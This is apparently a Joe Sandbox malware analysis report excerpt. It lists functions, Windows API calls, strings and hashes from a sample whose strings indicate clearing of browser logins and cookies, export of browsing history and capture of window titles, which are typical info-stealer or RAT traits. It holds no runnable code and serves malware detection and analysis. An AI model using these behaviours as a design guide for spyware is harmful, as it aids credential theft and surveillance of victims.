                                              • Instruction ID: 97232ba5d9c319a9ab57d8661bdb2c00ff30a3eb131e715f7221623c0240cd53
                                              • Opcode Fuzzy Hash: 39d4f960c4016b566d16a7f2a9497764bd7da49fa2d34244112897ccda02c51d
                                              • Instruction Fuzzy Hash: ADE06DB0108300ABCB08F760DCD6EFFB7ADAB95704F00482CB54392193DF70AE448615
                                              Function 000C1430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 000C143A
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C1441
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: GetCursorInfo$User32.dll
                                              • API String ID: 1646373207-2714051624
                                              • Opcode ID: a9b69a2f3cc2a19d0612cac031bc8c7a3c338d35341a84f609fb4d29428cf78e
                                              • Instruction ID: 1999c646091732b35fbdfce0bd3be08d004739c6417426724c19159cf8e6ad97
                                              • Opcode Fuzzy Hash: a9b69a2f3cc2a19d0612cac031bc8c7a3c338d35341a84f609fb4d29428cf78e
                                              • Instruction Fuzzy Hash: DAB092B854D3159BC6245BA0BE4E8493B34AB047023004141F44283BA0CB7410919A20
                                              Function 000C14D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 000C14DF
                                              • GetProcAddress.KERNEL32(00000000), ref: 000C14E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetLastInputInfo$User32.dll
                                              • API String ID: 2574300362-1519888992
                                              • Opcode ID: 5dc8eee556d7143fae482e430a47b439e7312ecd292b52d656bf9398af707a9b
                                              • Instruction ID: 83494c64d038b5726226161fe71505f06f17835a4b15df92c7722fe9f269537f
                                              • Opcode Fuzzy Hash: 5dc8eee556d7143fae482e430a47b439e7312ecd292b52d656bf9398af707a9b
                                              • Instruction Fuzzy Hash: 91B092B858C3A09BC7245BE0BE4E8683BB4BB087423008888F00282AA4CF7410A09F20
                                              Function 00108D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                              • Instruction ID: a7a5f658e4cf018276622bcfca1c2f39fe85451b88183588b4f71b05df9fca2d
                                              • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                              • Instruction Fuzzy Hash: CCA169729083469FDB25CF68C8917AEBBE6EF65350F18416DE5C49B2C2CBB88D41C750
                                              Function 001159CA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 7d94115d1edd7e5dc03f2da09effe5703dd0a9d27270afb8c34cdcdb924c2392
                                              • Instruction ID: 22b4647cbac26cee103e78c40c70a8ae2ec54ed3f866783a63533c5634286243
                                              • Opcode Fuzzy Hash: 7d94115d1edd7e5dc03f2da09effe5703dd0a9d27270afb8c34cdcdb924c2392
                                              • Instruction Fuzzy Hash: 3441F931A44900EBDF2DAAB89CC6AEE3A67EF91370F140235F4589B1D1D7F449C096A2
                                              Function 004C0F23 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 004C100B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: f1aec3b431f16c29a1ae30a5e188e7390e467b4d3a74b67c9d504762f04221b2
                                              • Instruction ID: 37db7b8bce4b1befea4292eedc19632542016c0b127df2ad6a9c700e1150dc0e
                                              • Opcode Fuzzy Hash: f1aec3b431f16c29a1ae30a5e188e7390e467b4d3a74b67c9d504762f04221b2
                                              • Instruction Fuzzy Hash: 35514C75900288CFDB72DFAACC80BEDBBB8AF46304F10415EE8559B262D7745A41CF15
                                              Function 00101A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0208a1fadba4402e0bccad4c2bab2475a9de97945b86fb704cf5a267c876287
                                              • Instruction ID: 52248ff279515905a201bd0304256ea1b156999ca33764a1f72dfe68f9f3a754
                                              • Opcode Fuzzy Hash: b0208a1fadba4402e0bccad4c2bab2475a9de97945b86fb704cf5a267c876287
                                              • Instruction Fuzzy Hash: 3B410872A00748BFD7289F78CC41BAABBF9EB94710F10452AF151DB6C1E7F599418780
                                              Function 000CB806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • [Cleared browsers logins and cookies.], xrefs: 000CB8DE
                                              • Cleared browsers logins and cookies., xrefs: 000CB8EF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                              • API String ID: 3472027048-1236744412
                                              • Opcode ID: cc236f08bc3be761b6eaa1a9455a2bda178a944d1cd9091772eea28bb63cf21b
                                              • Instruction ID: 7c0fa5dc6619c2e66eb53a8034862ad6414005713de6ff8f81318cfa51313f38
                                              • Opcode Fuzzy Hash: cc236f08bc3be761b6eaa1a9455a2bda178a944d1cd9091772eea28bb63cf21b
                                              • Instruction Fuzzy Hash: 25315C1564C380AADA156BB42867BEE7BD64FA3754F48845CF8C41B293DF52880DD363
                                              Function 000C9C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000DB6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000DB6F6
                                                • Part of subcall function 000DB6E6: GetWindowTextLengthW.USER32(00000000), ref: 000DB6FF
                                                • Part of subcall function 000DB6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000DB729
                                              • Sleep.KERNEL32(000001F4), ref: 000C9C95
                                              • Sleep.KERNEL32(00000064), ref: 000C9D1F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$ForegroundLength
                                              • String ID: [ $ ]
                                              • API String ID: 3309952895-93608704
                                              • Opcode ID: 50de9f6f8423ad265d8d151e937164fcffc891ff67f571b9c004760d702f52f6
                                              • Instruction ID: 69713c27d94870f173536eec6907408d69661e7fb2a1ecba8c98c51893c37258
                                              • Opcode Fuzzy Hash: 50de9f6f8423ad265d8d151e937164fcffc891ff67f571b9c004760d702f52f6
                                              • Instruction Fuzzy Hash: A311DF32514200ABC228B734DC5BFEEB7A9AF41700F40442EF543525D3EF31AE198696
                                              Function 00102CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20aeea2651da2377aa1c77911f936c7ed550ca2fc80ba9deccefe49ab00e35ee
                                              • Instruction ID: c5f37f56c459c09918c692e1d792341e85bb46d7da93eb0b6d4a0124c04d1eba
                                              • Opcode Fuzzy Hash: 20aeea2651da2377aa1c77911f936c7ed550ca2fc80ba9deccefe49ab00e35ee
                                              • Instruction Fuzzy Hash: 0301F2B26092057FFA2026B87CC8FA7231CEBA13B8B340726F461651D5EFB08C504260
                                              Function 00102D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0d656a0578f463e6558503612858d07642694783c25ebeb5c5adb01a21a70c9
                                              • Instruction ID: 1775a0587c25ff458d811be941437e5432ac55df3376e3fc51d34ec21ce2550e
                                              • Opcode Fuzzy Hash: e0d656a0578f463e6558503612858d07642694783c25ebeb5c5adb01a21a70c9
                                              • Instruction Fuzzy Hash: ED0128B260921ABEE72126F87CD8DA7235DDF913B43350335F4A1621D5EFF08C514260
                                              Function 0041A460 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0041A487
                                              • GetWindowLongA.USER32(?,000000EB), ref: 0041A494
                                              • GetWindow.USER32(?,00000004), ref: 0041A4C7
                                              • GetParent.USER32(?), ref: 0041A4CE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Window$LongMessageParentSend
                                              • String ID:
                                              • API String ID: 2571540958-0
                                              • Opcode ID: f87e2db7d642b718cdb5e782880d86ae2cc92590bc91bf3e2829ce3af81419a0
                                              • Instruction ID: d14a4c9261c9bfe6ea89002c6d86b05037672ab9812461308a4e6696fe1dd4f1
                                              • Opcode Fuzzy Hash: f87e2db7d642b718cdb5e782880d86ae2cc92590bc91bf3e2829ce3af81419a0
                                              • Instruction Fuzzy Hash: FA01F9366436217BC72296255C14EBB3659EFC62A0F054526F9089B321FB78CC1242AE
                                              Function 000F80F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 000F810F
                                                • Part of subcall function 000F805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 000F808B
                                                • Part of subcall function 000F805C: ___AdjustPointer.LIBCMT ref: 000F80A6
                                              • _UnwindNestedFrames.LIBCMT ref: 000F8124
                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 000F8135
                                              • CallCatchBlock.LIBVCRUNTIME ref: 000F815D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                              • String ID:
                                              • API String ID: 737400349-0
                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                              • Instruction ID: 896bc3b5a843c06eda655abff89cabe3e3964acdcff6f333a4e6cd0ae6ee9f67
                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                              • Instruction Fuzzy Hash: 8C01D73210010DBBDF126E95CD45EEB7B6DFF88754F048518FB48A6522DB32E861EBA1
                                              Function 00107210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,001071B7,?,00000000,00000000,00000000,?,001074E3,00000006,FlsSetValue), ref: 00107242
                                              • GetLastError.KERNEL32(?,001071B7,?,00000000,00000000,00000000,?,001074E3,00000006,FlsSetValue,0011D328,FlsSetValue,00000000,00000364,?,00106F91), ref: 0010724E
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001071B7,?,00000000,00000000,00000000,?,001074E3,00000006,FlsSetValue,0011D328,FlsSetValue,00000000), ref: 0010725C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 4e9716214e35fa5c2bf43a7371fc67b9e42167914aba0316cfb36cbd2369af76
                                              • Instruction ID: f11431f29e1c6e7ea2f4213115861bb28ef09be3c3f2ae6544173bbc3994f325
                                              • Opcode Fuzzy Hash: 4e9716214e35fa5c2bf43a7371fc67b9e42167914aba0316cfb36cbd2369af76
                                              • Instruction Fuzzy Hash: 1501FC32A5D2276BC7254E79AD44E9677A8AF09BA17114220F946D36C0D760EC00C6D0
                                              Function 000DB61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 000DB647
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000DB66C
                                              • CloseHandle.KERNEL32(00000000), ref: 000DB67A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleReadSize
                                              • String ID:
                                              • API String ID: 3919263394-0
                                              • Opcode ID: d664fb3fc513a75eef2466294e9028a86db049bbb8f78475dd2a6e537b9fe5d5
                                              • Instruction ID: cc1034bc01a13ac9263aae04b324698c6b2673bb55ffdf1f575936f2dfd66ed6
                                              • Opcode Fuzzy Hash: d664fb3fc513a75eef2466294e9028a86db049bbb8f78475dd2a6e537b9fe5d5
                                              • Instruction Fuzzy Hash: 4DF0F6B1245208BFE6151B24AC85FFF37ACEB867A4F01022EF802D23C1CA654C455131
                                              Function 000D850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemMetrics.USER32(0000004C), ref: 000D8519
                                              • GetSystemMetrics.USER32(0000004D), ref: 000D851F
                                              • GetSystemMetrics.USER32(0000004E), ref: 000D8525
                                              • GetSystemMetrics.USER32(0000004F), ref: 000D852B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-0
                                              • Opcode ID: c6ddaa235f21bcf1850dafe8345ec14d77b907e5385fcc6e2b3e4f267dc33d6b
                                              • Instruction ID: 7494ce9c0dccb8e57b63d2ded61c2766c4f03b2e6b7a09cb85122499abc1fd17
                                              • Opcode Fuzzy Hash: c6ddaa235f21bcf1850dafe8345ec14d77b907e5385fcc6e2b3e4f267dc33d6b
                                              • Instruction Fuzzy Hash: 03F02662B047214BCA00AE785C0092FAB96DFC02A0F25882BF6099B342EEB4EC0147F0
                                              Function 000DB37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 000DB395
                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 000DB3A8
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 000DB3D3
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 000DB3DB
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleOpenProcess
                                              • String ID:
                                              • API String ID: 39102293-0
                                              • Opcode ID: d7da7127c91ea953b1a7f2b9966106bb7ee948204bdae7f63f04fe8ab751f0ea
                                              • Instruction ID: 2a668956c8bb4917c89e2699badf01c633f8902aa305605ef3f53cd8b6bca5c5
                                              • Opcode Fuzzy Hash: d7da7127c91ea953b1a7f2b9966106bb7ee948204bdae7f63f04fe8ab751f0ea
                                              • Instruction Fuzzy Hash: 7BF0F471244316EBD71563549C5AFFBB2BCDB44B91F020016FA51D23A1EFB0CE814676
                                              Function 0043C050 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0043C055
                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0043C06E
                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0043C07D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043C084
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: bde29647645f6f62431ba4956432fcdcdd02fa35a371fb05dad9c327f0370f79
                                              • Instruction ID: 647cde6ad6d127a058f9c9188c9070063168958bc0e1fe4f50d07073395ba153
                                              • Opcode Fuzzy Hash: bde29647645f6f62431ba4956432fcdcdd02fa35a371fb05dad9c327f0370f79
                                              • Instruction Fuzzy Hash: E1E09235381351ABD3208F759CC5B4BBBA8EFC9B62F114025F508A7290C73098018B79
                                              Function 0043C010 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0043C015
                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0043C026
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043C02D
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043C035
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction ID: 466c391f0f8cbe89267b517a2457401cac0d02a45389bc6ea158d6bce9fdb278
                                              • Opcode Fuzzy Hash: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction Fuzzy Hash: 65D0123A7812647BF21017755C8AF575A5DCFC96E2F000132FA05DA2E185704C018678
                                              Function 00101EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00101F6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: a65f6be6619808f2296c9857c7b50387e59588a1f70a86d334897dda844c4041
                                              • Instruction ID: 0f2a3617dc242a5e84fddafc06e7fd20ab2ad322785a815307255b092d85de35
                                              • Opcode Fuzzy Hash: a65f6be6619808f2296c9857c7b50387e59588a1f70a86d334897dda844c4041
                                              • Instruction Fuzzy Hash: 27515B71A08206AAC7297714DD513BA7B94AB50740F308F58F4D5422E9EFFA8CD8DEC6
                                              Function 000C3A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000C3A2A
                                                • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00125900,000CC07B,.vbs,?,?,?,?,?,001342F8), ref: 000DAB5F
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(000C3AB9,?,?,000C3AB9,00125324), ref: 000D76CC
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(00125324,?,?,000C3AB9,00125324), ref: 000D76D5
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • Sleep.KERNEL32(000000FA,00125324), ref: 000C3AFC
                                              Strings
                                              • /sort "Visit Time" /stext ", xrefs: 000C3A76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                              • String ID: /sort "Visit Time" /stext "
                                              • API String ID: 368326130-1573945896
                                              • Opcode ID: 58c7076b995b71f80f9bc54b640d39fc6643559323f73664ca8abf2f40e95bf0
                                              • Instruction ID: 6ce54eea3bc43ee0d4568235917521f9124c45dce995a37009f49e5271b9f60e
                                              • Opcode Fuzzy Hash: 58c7076b995b71f80f9bc54b640d39fc6643559323f73664ca8abf2f40e95bf0
                                              • Instruction Fuzzy Hash: 3B314F31A102145ADB18F7B4DC96FEEB775AF92310F40406DF906A7193EF705E4ACA91
                                              Function 0040982C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Un-Install PunkBuster Service, xrefs: 004098CF
                                              • Are you sure you want to un-install the PunkBuster Service?, xrefs: 004098DC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
